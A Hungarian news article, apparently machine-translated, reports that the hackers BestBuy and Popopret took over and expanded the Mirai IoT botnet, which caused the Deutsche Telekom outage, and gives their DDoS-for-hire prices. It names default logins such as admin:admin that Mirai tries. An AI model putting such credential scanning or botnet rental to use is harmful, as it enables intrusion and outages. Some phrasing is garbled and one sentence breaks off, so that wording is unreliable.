A múlt hónapban voltak támadások olyan nagy webhelyek ellen, mint pl Twitter vagy a Spotify-t, amely ideiglenesen letiltotta őket. Ehhez botnetet használtak Mirai, 400-500 ezer Internet of Things eszközt egyesít. Az alaplap újságírói most megtudták, hogy két hackernek sikerült átvennie az irányítást a botnet felett, és létrehozni egy új verziót - ez már millió eszközt egyesít. A német szolgáltató előfizetői megtapasztalták annak erejét Deutsche Telekom, amelynek hálózata leállt a múlt hétvégén.

Vadászat Miraira

Az újságíróknak sikerült beszélniük a két titokzatos hacker egyikével – a BestBuy becenevet használja. Egy titkosított online csevegésben elmondta nekik, hogy a hackerek között valódi küzdelem folyik Mirai irányításáért. Nemrég sérülékenységet fedeztek fel a szoftverében. Használata és sebessége lehetővé teheti, hogy a BestBuy és partnere, a Popopret átvegye az irányítást a botnet többsége felett, és új eszközöket adjon hozzá.

Korábban szakértőink tanulmányozták a Mirai botnet kódját - kiderült, hogy nem kifejezetten a tárgyak internete eszközeihez készült. A rosszindulatú szoftverek alapértelmezett bejelentkezési nevekkel és jelszavakkal (admin:admin, root:password stb.) keresik a hálózathoz csatlakozó eszközöket. Ez azt jelenti, hogy elméletileg bármilyen eszközt tartalmazhat, beleértve az otthoni számítógépeket és a szervereket vagy útválasztókat.

IoT eszközök- általában routerek - benne vannak Mirai botnet amíg újra nem indul – akkor a féreg törlődik a memóriájukból. A botnet azonban folyamatosan keresi az internetet a sebezhető eszközök után, így egy „meggyógyult” eszköz gyorsan ismét a részévé válhat. A hackerek között igazi verseny folyik, hogy elsőként fertőzzenek meg minél több eszközt.

Arról nincs információ, hogy az új Mirai készítői hogyan tudják megelőzni a versenytársakat. Ugyanakkor azt mondták az újságíróknak, hogy saját botnetjüket használják a potenciálisan sebezhető eszközök átvizsgálására, beleértve azokat is, amelyek korábban a botnet részét képezték.

„Miért ne lehetne a Mirai-nak vadászni a Miraira, és felfalni az eredetit” – mondja a BestBuy.

Nem csak Mirai

Az új botnet azonban nem csak a régi Mirai-eszközöket és az alapértelmezett jelszavakkal rendelkező újakat szívta fel. Alkotói 0 napos sebezhetőséget is használnak az IoT-eszközök firmware-ében. A szakértők korábban az ilyen „kombinált” botnetek küszöbön álló megjelenését jósolták.

Az ellenük folytatott küzdelem észrevehetően bonyolultabbá válik - ha a Mirai elleni küzdelem érdekében a végkészülék felhasználójának csak a bejelentkezési nevét és jelszavát kell megváltoztatnia a hozzáféréshez, akkor nem fog tudni megbirkózni a kütyü sebezhetőségeivel. .

DDoS 700 Gbps sebességgel

A BestBuy és a Popopret hackerek reklámozni kezdték szolgáltatásaikat – hozzáférést kínálnak hozzájuk új verzió Mirai, spam üzeneteket küld XMPP/Jabberen keresztül,

A hacker szerint többféle szolgáltatáscsomagot kínálnak az ügyfeleknek. Az olcsóbbat megéri $2 000 - Ennyi pénzért az ügyfelek bérelhetnek 20 000 és 25 000 között botnet csomópontok akár két hétig is indíthatnak őrszemeket, tizenöt perc szünettel a támadások között. Mögött $15 000 vagy $20 000 az ügyfeleknek most lehetőségük van arra, hogy 600 000 bot indítson kétórás támadást 30 vagy 15 perces szünetekkel. A második esetben a támadóerő lesz 700 Gbit/s vagy több.

Kilátások

Biztonság IoT eszközök gyakran meglehetősen alacsony szinten van - ez azzal magyarázható, hogy a szállítókat gyakran nem érdekli további intézkedések végrehajtása információ biztonság. Termékeik egyszerű használatát hirdetik, de minden további biztonsági intézkedés megkötéseket és erőforrásokat igényel.

Ahogy fentebb említettük, csak a végeszköz-fejlesztők vagy az azokat biztosító szolgáltatók (útválasztók esetében) tudják megvédeni a felhasználókat a fejlettebb botnetekkel szemben. A Mirai új verziójának támadása által érintett német Deutsche Telekom már bejelentette, hogy „átgondolja az üzleti kapcsolatokat” a sebezhető routerek szállítóival. Speedport, vállalat Arcadyan.

Végső soron egyrészt a szolgáltatók szigorúbb eszközellenőrzésének bevezetésével, másrészt az IoT-re vonatkozó szabványok és szabályozó dokumentációk kidolgozásával lehet majd növelni a tárgyak internetének biztonsági szintjét. . Számos országban tettek már hasonló intézkedéseket az automatizált folyamatirányító rendszerek biztonsága érdekében. Az első lépések ebben az irányban már megtörténtek - több informatikai szállító például szeptemberben publikált egy dokumentumot, melynek címe Az ipari internet biztonság Keretrendszer (IISF)- javasolja, hogy a dolgok internetét az „ipari internet” részének tekintsék.

A probléma azonban még mindig messze van a végleges megoldástól, és a hackerek BestBuy és Popopret nagy léptékű monopóliumot szerezhet DDoS támadások online. Ez egy meglehetősen szomorú tény, de a hackerek maguk a beszélgetés során Alaplap kijelentette, hogy tevékenységüket nemcsak a haszon, hanem az erkölcsi elvek is vezérlik. A BestBuy tehát azt mondta, hogy nem engedik meg az ügyfeleknek, hogy megtámadják a kritikus infrastruktúrával dolgozó cégek IP-címeit.